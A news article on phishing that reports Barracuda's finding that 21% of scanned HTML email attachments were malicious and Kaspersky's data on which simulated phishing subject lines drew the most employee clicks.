Over 20% of all HTML email attachments scanned over the past month were malicious: Report

With brands, companies and organisations trying to reach out to consumers and audiences with their email campaigns, tech-savvy con artists and identity theft criminals have been carrying out email phishing and scams for long. Among many other tricks, these miscreants also target employees faking internal official emails. 

According to a latest study by IT security company Barracuda, 21% of all attachments being embedded in emails were malicious. 

Barracuda said that it has analysed data on the millions of attachments scanned by Barracuda systems over the past month to identify HTML attachments being used the most for malicious purposes. 

HTML attachments are commonly used in email communication. These are particularly common in system-generated email reports that users might receive regularly. These messages include URL links to the actual report, it said.

The security company further said that attackers have been embedding HTML attachments in emails disguised as a weekly report, tricking users into clicking on phishing links. These are successful techniques because hackers no longer need to include malicious links in an email, allowing them to easily bypass anti-spam and anti-virus policies.

Also read: Ransomware attacks look beyond money, target govts 

The fake HTML attachments are used for stealing credentials. They include a link to a phishing site, which, when opened, gets redirected to a third-party machine that requests the users to enter their credentials to access information or download a file that may contain malware.   
  
The miscreants do not always need to create a fake website. They can create a phishing form directly embedded in the attachment, ultimately sending phishing sites as attachments instead of links.  

According to Parag Khurana, Country Manager, Barracuda Networks India, “These attacks are difficult to detect because HTML attachments themselves are not malicious. Attackers do not include malware in the attachment but instead use multiple redirects with Javascript libraries hosted elsewhere.” 

Barracuda mentions that considering such HTML attachments are difficult to recognise precisely, and detection often includes many false positives, the ideal solutions are machine learning and static code analysis that can evaluate the content of an email to identify and block malicious HTML attachments. 

A 27 June report by cyber security company Kaspersky shows that “workers tend not to notice pitfalls hidden in emails devoted to corporate issues and delivery problem notifications. Almost one in five (16% to 18%) clicked the link in the email templates imitating these phishing attacks. 

Kaspersky noted that according to recent phishing simulation campaigns, the five most effective types of phishing email are: 

With email subject as “Failed delivery attempt — Unfortunately, our courier was unable to deliver your item, marking sender as “Mail delivery service”, fetched a click conversion of 18.5%. 

With email subject as “Emails not delivered due to overloaded mail servers,” marking sender as “The Google support team”, fetched a click conversion of 18%. 

With email subject as “Online employee survey: What would you improve about working at the company,” marking sender as “HR Department”, fetched a click conversion of 18%. 

With email subject as “Reminder: New company-wide dress code,” marking sender as “Human Resources”, fetched a click conversion of 17.5%; 

With email subject as “Attention all employees: new building evacuation plan,” marking sender as “Safety Department,” fetched a click conversion of 16%. 

Among the other phishing emails that gained a significant number of clicks are, reservation confirmations from a booking service (11%), a notification about an order placement (11%), and an IKEA contest announcement (10%). 

On the other hand, emails that threaten the recipient, or offer instant benefits, appeared to be less “successful”. A template with the subject “I hacked your computer and know your search history” gained 2% of clicks, while offers for free Netflix and $1,000 by clicking a link tricked just 1% of employees.  

According to Elena Molchanova, Head of Security Awareness Business Development at Kaspersky, phishing simulation is one of the simplest ways to track employees’ cyber-resilience and evaluate the efficiency of their cybersecurity training. However, there are significant aspects that must be considered when conducting this assessment to make it really impactful.